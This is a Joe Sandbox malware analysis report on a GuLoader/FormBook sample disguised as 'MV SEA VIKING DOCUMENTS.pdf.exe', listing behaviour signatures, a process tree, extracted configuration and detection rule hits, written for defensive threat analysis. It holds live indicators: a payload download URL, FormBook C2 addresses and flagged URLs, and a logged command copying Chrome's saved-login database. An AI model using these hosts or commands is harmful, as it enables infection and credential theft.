Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
MV SEA VIKING DOCUMENTS.pdf.exe

Overview

General Information

Sample Name:MV SEA VIKING DOCUMENTS.pdf.exe
Analysis ID:575819
MD5:319860d181378bf868e4deedcf5fbfb6
SHA1:cf91efda8bdba4674cb72d33ce391241ec4b9678
SHA256:58f1715336d2b7478c4539589dfc2065b3201df5505756474e00636b432cb378
Infos:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Sigma detected: Suspicious Double Extension
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
Injects a PE file into a foreign processes
Uses an obfuscated file name to hide its real file extension (double extension)
Uses dynamic DNS services
Tries to harvest and steal browser information (history, passwords, etc)
Hides threads from debuggers
Sample uses process hollowing technique
Writes to foreign memory regions
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to resolve many domain names, but no domain seems valid
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Yara signature match
Sigma detected: CurrentVersion Autorun Keys Modification
Contains functionality to shutdown / reboot the system
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Connects to many different domains
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: Autorun Keys Modification
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64native
  • MV SEA VIKING DOCUMENTS.pdf.exe (PID: 8400 cmdline: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" MD5: 319860D181378BF868E4DEEDCF5FBFB6)
    • MV SEA VIKING DOCUMENTS.pdf.exe (PID: 8720 cmdline: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" MD5: 319860D181378BF868E4DEEDCF5FBFB6)
      • explorer.exe (PID: 4908 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • chkdsk.exe (PID: 2576 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: B4016BEE9D8F3AD3D02DD21C3CAFB922)
          • cmd.exe (PID: 3396 cmdline: /c del "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 8880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • cmd.exe (PID: 4864 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 1044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • firefox.exe (PID: 5828 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
        • shmhprg0nvltzt.exe (PID: 4468 cmdline: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe MD5: 319860D181378BF868E4DEEDCF5FBFB6)
          • shmhprg0nvltzt.exe (PID: 3436 cmdline: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe MD5: 319860D181378BF868E4DEEDCF5FBFB6)
        • shmhprg0nvltzt.exe (PID: 5244 cmdline: "C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe" MD5: 319860D181378BF868E4DEEDCF5FBFB6)
        • shmhprg0nvltzt.exe (PID: 1648 cmdline: "C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe" MD5: 319860D181378BF868E4DEEDCF5FBFB6)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "https://drive.google.com/uc?export=download&id=1_L7ZipgVNc4_sHw57wljySn0gUbSqwED"}

Threatname: FormBook

{"C2 list": ["www.istemnetwork.com/be4o/"], "decoy": ["neonewway.club", "kuanghong.club", "7bkj.com", "ooo-club.com", "kamchatka-agency.com", "sjsndtvitzru.mobi", "noireimpactcollective.net", "justbe-event.com", "easypeasy.community", "southcoast.glass", "janhenningsen.com", "jmxyjj.com", "tarihibilet.com", "nagradi7.com", "percentrostered.net", "certvaxid.com", "kingseafoodsydney.com", "blacksheepwalk.com", "waktuk.com", "inteligenciaenrefrigeracion.com", "marvinhull.com", "fikretbayrakdar.com", "rsxrsh.com", "vastukalabid.com", "belindahulett.com", "aibet888.club", "icarus-groupe.com", "vendasdigitaisonline.com", "fairytalepageants.com", "imaginativeprint.com", "quanqiu55555.com", "owensigns.com", "kaikkistore.com", "dreamintelligent.com", "piqqekqqbpjpajbzvvfqapwr.store", "mariachinuevozacatecas24-7.com", "glenndcp.com", "vaughnediting.com", "10dian-3.com", "buresdx.com", "itservon.com", "buyingusedfurniture.com", "elektropanjur.com", "logotzo.com", "eaglesaviationexperience.com", "antoniopasciuti.com", "personas1web.com", "hvbatterystore.com", "ksustudyabroad.com", "4huav946.com", "gojajix.xyz", "kennycheng.tech", "traditionnevertrend.com", "mytrainermatrix.online", "basculasperu.com", "eljkj.com", "teleconstructiongroup.com", "28682df.com", "altimiravet.com", "worldplantaward.com", "mydxza.com", "josiemaran-supernatural.com", "brainymortgage.info", "diffamr.net"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ad9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bec:$sqlite3step: 68 34 1C 7B E1
    • 0x16b08:$sqlite3text: 68 38 2A 90 C5
    • 0x16c2d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b1b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c43:$sqlite3blob: 68 53 D8 7F 8C
    0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8608:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1492f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1341c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa132:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19ba7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac4a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x6ad9:$sqlite3step: 68 34 1C 7B E1
      • 0x6bec:$sqlite3step: 68 34 1C 7B E1
      • 0x6b08:$sqlite3text: 68 38 2A 90 C5
      • 0x6c2d:$sqlite3text: 68 38 2A 90 C5
      • 0x6b1b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x6c43:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 21 entries

      Sigma Signatures

      System Summary

      barindex
      Sigma detected: Suspicious Double Extension
      Source: Process startedAuthor: Florian Roth (rule), @blu3_team (idea): Data: Command: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" , CommandLine: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" , CommandLine|base64offset|contains: H@, Image: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, NewProcessName: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, OriginalFileName: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, ParentCommandLine: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" , ParentImage: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, ParentProcessId: 8400, ProcessCommandLine: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" , ProcessId: 8720
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\chkdsk.exe, ProcessId: 2576, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\1BIHHVSHQZC
      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton: Data: Details: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exe\1, EventID: 13, EventType: SetValue, Image: C:\Windows\explorer.exe, ProcessId: 4908, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU\a
      Source: Process startedAuthor: frack113: Data: Command: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" , CommandLine: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" , CommandLine|base64offset|contains: H@, Image: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, NewProcessName: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, OriginalFileName: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, ParentCommandLine: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" , ParentImage: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe, ParentProcessId: 8400, ProcessCommandLine: "C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exe" , ProcessId: 8720

      Joe Sandbox Signatures

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Antivirus detection for URL or domain
      Source: http://www.waktuk.com/be4o/Avira URL Cloud: Label: malware
      Source: http://www.rsxrsh.com/be4o/Avira URL Cloud: Label: malware
      Source: http://www.noireimpactcollective.net/be4o/?h48Hl=vWcq0X33Y2hBfiL/bHeP0RWtqtuntvM4ehZwLUMPr58K+hEeg2YqRGCwATn/AzHlKLs2&GXqXh=YZ_XN0Avira URL Cloud: Label: malware
      Source: http://www.waktuk.com/be4o/?7nx8=7nN0Wh-H7&h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfuAvira URL Cloud: Label: malware
      Source: https://www.vaughnediting.com/be4o/?Olnhrn=ongdD4qXjjPP&h48Hl=o5nWsVahRRcZ5g7lskYZzD6T98nAnbLK/jyfa2Avira URL Cloud: Label: malware
      Source: www.istemnetwork.com/be4o/Avira URL Cloud: Label: malware
      Source: http://www.josiemaran-supernatural.com/be4o/Avira URL Cloud: Label: malware
      Source: http://www.buresdx.com/be4o/Avira URL Cloud: Label: malware
      Source: http://www.josiemaran-supernatural.com/be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&GXqXh=YZ_XN0Avira URL Cloud: Label: malware
      Source: http://www.noireimpactcollective.net/be4o/Avira URL Cloud: Label: malware
      Source: http://www.rsxrsh.com/be4o/?h48Hl=Tpp8LERQoafeDPvT4B0Z2/EHkXBIuz7bjHlQVU8N2p3tpS82PcmIpc4MoLsyxaBwDc0d&GXqXh=YZ_XN0Avira URL Cloud: Label: malware
      Source: http://www.waktuk.com/be4o/?h48Hl=ZACv9IykpsLcwv8F8kwPwUzl7gpv2Xu+P+MOxVxbXGrtU1PWc37Ho1yUPVVacpXBvcfu&GXqXh=YZ_XN0Avira URL Cloud: Label: malware
      Source: http://www.josiemaran-supernatural.com/be4o/?h48Hl=do8Jf58SEKGGCNGHZbpskk9a9mhTmrx8G+lp6qHzh6DMjzgDqGs60o4ehjqHyuaS4N4w&w6=ZbFDmLAvira URL Cloud: Label: malware
      Source: http://www.buresdx.com/be4o/?h48Hl=CBV85lUl5iGXXllmWETcgzTRYTuU0jkLI/xLLa4RVPF6HDjlZoPpCKC/374THXhEpvSN&GXqXh=YZ_XN0Avira URL Cloud: Label: malware
      Found malware configuration
      Source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.istemnetwork.com/be4o/"], "decoy": ["neonewway.club", "kuanghong.club", "7bkj.com", "ooo-club.com", "kamchatka-agency.com", "sjsndtvitzru.mobi", "noireimpactcollective.net", "justbe-event.com", "easypeasy.community", "southcoast.glass", "janhenningsen.com", "jmxyjj.com", "tarihibilet.com", "nagradi7.com", "percentrostered.net", "certvaxid.com", "kingseafoodsydney.com", "blacksheepwalk.com", "waktuk.com", "inteligenciaenrefrigeracion.com", "marvinhull.com", "fikretbayrakdar.com", "rsxrsh.com", "vastukalabid.com", "belindahulett.com", "aibet888.club", "icarus-groupe.com", "vendasdigitaisonline.com", "fairytalepageants.com", "imaginativeprint.com", "quanqiu55555.com", "owensigns.com", "kaikkistore.com", "dreamintelligent.com", "piqqekqqbpjpajbzvvfqapwr.store", "mariachinuevozacatecas24-7.com", "glenndcp.com", "vaughnediting.com", "10dian-3.com", "buresdx.com", "itservon.com", "buyingusedfurniture.com", "elektropanjur.com", "logotzo.com", "eaglesaviationexperience.com", "antoniopasciuti.com", "personas1web.com", "hvbatterystore.com", "ksustudyabroad.com", "4huav946.com", "gojajix.xyz", "kennycheng.tech", "traditionnevertrend.com", "mytrainermatrix.online", "basculasperu.com", "eljkj.com", "teleconstructiongroup.com", "28682df.com", "altimiravet.com", "worldplantaward.com", "mydxza.com", "josiemaran-supernatural.com", "brainymortgage.info", "diffamr.net"]}
      Source: 00000000.00000002.2304287557.0000000002450000.00000040.00000001.00040000.00000008.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1_L7ZipgVNc4_sHw57wljySn0gUbSqwED"}
      Multi AV Scanner detection for submitted file
      Source: MV SEA VIKING DOCUMENTS.pdf.exeReversingLabs: Detection: 13%
      Yara detected FormBook
      Source: Yara matchFile source: 0000000D.00000002.2763779183.00000000000A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000000.2599606757.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.7208295092.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.2792237612.000000001EE30000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000010.00000000.2534241139.0000000011CA3000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.7201760194.0000000000870000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000015.00000002.7208839040.0000000005030000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Multi AV Scanner detection for dropped file
      Source: C:\Users\user\AppData\Local\Temp\E6l40hhe\shmhprg0nvltzt.exeReversingLabs: Detection: 13%
      Source: 33.0.firefox.exe.2234796c.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 21.2.chkdsk.exe.594796c.3.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 33.0.firefox.exe.2234796c.1.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: 33.2.firefox.exe.2234796c.0.unpackAvira: Label: TR/Patched.Ren.Gen
      Source: MV SEA VIKING DOCUMENTS.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49756 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49757 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.174:443 -> 192.168.11.20:49807 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49808 version: TLS 1.2
      Source: MV SEA VIKING DOCUMENTS.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
      Source: Binary string: chkdsk.pdbGCTL source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2764071041.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759710918.0000000001A9F000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759317493.0000000001AFF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: cliconfg.pdb source: cliconfg.dll.0.dr
      Source: Binary string: mshtml.pdb source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304568262.0000000000649000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676961765.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: raschapext.pdb source: raschapext.dll.0.dr
      Source: Binary string: raschapext.pdbGCTL source: raschapext.dll.0.dr
      Source: Binary string: chkdsk.pdb source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2764071041.00000000000D0000.00000040.10000000.00040000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759710918.0000000001A9F000.00000004.00000020.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000003.2759317493.0000000001AFF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdbUGP source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.2763822074.00000000050A0000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: MV SEA VIKING DOCUMENTS.pdf.exe, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2795309997.000000001F2CD000.00000040.00000800.00020000.00000000.sdmp, MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000002.2793173787.000000001F1A0000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, chkdsk.exe, 00000015.00000002.7211691730.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000003.2763822074.00000000050A0000.00000004.00000800.00020000.00000000.sdmp, chkdsk.exe, 00000015.00000002.7213827329.000000000551D000.00000040.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, shmhprg0nvltzt.exe, 00000023.00000002.4843522033.000000001F190000.00000040.00000800.00020000.00000000.sdmp, shmhprg0nvltzt.exe, 00000023.00000002.4845502772.000000001F2BD000.00000040.00000800.00020000.00000000.sdmp
      Source: Binary string: usp10.pdb source: usp10.dll.0.dr
      Source: Binary string: ProvMigrate.pdb source: provmigrate.dll.0.dr
      Source: Binary string: mshtml.pdbUGP source: MV SEA VIKING DOCUMENTS.pdf.exe, 0000000D.00000001.2304568262.0000000000649000.00000020.00000001.01000000.00000007.sdmp, shmhprg0nvltzt.exe, 00000023.00000001.4676961765.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: cliconfg.pdbGCTL source: cliconfg.dll.0.dr
      Source: Binary string: ProvMigrate.pdbGCTL source: provmigrate.dll.0.dr
      Source: Binary string: usp10.pdbGCTL source: usp10.dll.0.dr
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C49
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_00406873 FindFirstFileW,FindClose,0_2_00406873
      Source: C:\Users\user\Desktop\MV SEA VIKING DOCUMENTS.pdf.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0087FA90 FindFirstFileW,FindNextFileW,FindClose,21_2_0087FA90
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 21_2_0087FA89 FindFirstFileW,FindNextFileW,FindClose,21_2_0087FA89
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 30_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,30_2_00405C49
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 30_2_00406873 FindFirstFileW,FindClose,30_2_00406873
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 30_2_0040290B FindFirstFileW,30_2_0040290B
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 34_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,34_2_00405C49
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 34_2_00406873 FindFirstFileW,FindClose,34_2_00406873
      Source: C:\Program Files (x86)\E6l40hhe\shmhprg0nvltzt.exeCode function: 34_2_0040290B FindFirstFileW,34_2_0040290B

      Networking

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49779 -> 79.110.48.188:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49779 -> 79.110.48.188:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49779 -> 79.110.48.188:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49785 -> 54.154.44.39:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49785 -> 54.154.44.39:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49785 -> 54.154.44.39:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49791 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49798 -> 162.0.209.21:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49798 -> 162.0.209.21:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49798 -> 162.0.209.21:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49800 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49800 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49800 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49815 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49832 -> 54.154.44.39:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49832 -> 54.154.44.39:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49832 -> 54.154.44.39:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49834 -> 154.214.67.115:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49834 -> 154.214.67.115:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49834 -> 154.214.67.115:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49840 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49852 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49852 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49852 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 217.160.0.98:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 217.160.0.98:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 217.160.0.98:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49865 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49865 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49865 -> 66.29.154.157:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49871 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49871 -> 45.195.115.71:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49871 -> 45.195.115.71:80
      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\explorer.exeNetwork Connect: 154.23.172.38 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 35.214.4.70 80Jump to behavior
